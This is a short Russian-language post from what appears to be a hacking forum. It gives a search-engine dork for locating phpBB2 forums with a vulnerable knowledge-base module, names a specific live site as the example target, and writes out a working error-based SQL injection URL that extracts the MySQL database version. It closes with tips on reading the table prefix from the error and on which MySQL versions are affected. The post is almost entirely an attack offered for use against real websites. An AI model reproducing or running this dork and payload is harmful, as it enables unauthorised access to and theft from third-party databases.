Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Target: phpbb2* Dork: inurl:"kb.php?mode=cat" Example:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13
SQL injection (without union+select):
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)
Префикс таблицы kb_categories может отличаться, но его видно в ошибке PS: актуально для 4.1<=MySQL=>5
|